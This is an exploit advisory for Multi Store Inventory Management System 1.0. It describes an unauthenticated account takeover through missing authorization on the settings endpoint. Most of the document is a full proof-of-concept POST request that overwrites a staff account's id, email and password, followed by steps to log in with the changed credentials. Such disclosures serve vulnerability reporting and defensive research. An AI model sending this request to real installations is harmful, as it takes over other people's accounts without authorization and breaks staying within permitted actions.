Multi Store Inventory Management System version 1.0 suffers from an account takeover vulnerability due to missing authorization controls.
e6feb7f442646bfe2e6bd718321e6b7a
# Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)
# Date: 04/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz
# Description :
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "email", "password" , "firstname" and "lastname" parameters
#Steps to Reproduce :
1. Send the below POST request by changing "id", "email", "password" parameters.
2. Log in to the user account by changed email and password.
################################################
POST /multistore_demo/dashboard/home/setting HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687
Content-Length: 1645
Origin: http://localhost
Connection: close
Referer: http://localhost/multistore_demo/dashboard/home/setting
Cookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405
Upgrade-Insecure-Requests: 1
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="id"
1
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="firstname"
saud
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="lastname"
test
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="password"
admin123
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="about"
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="old_image"
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------246162487211952414471071914687--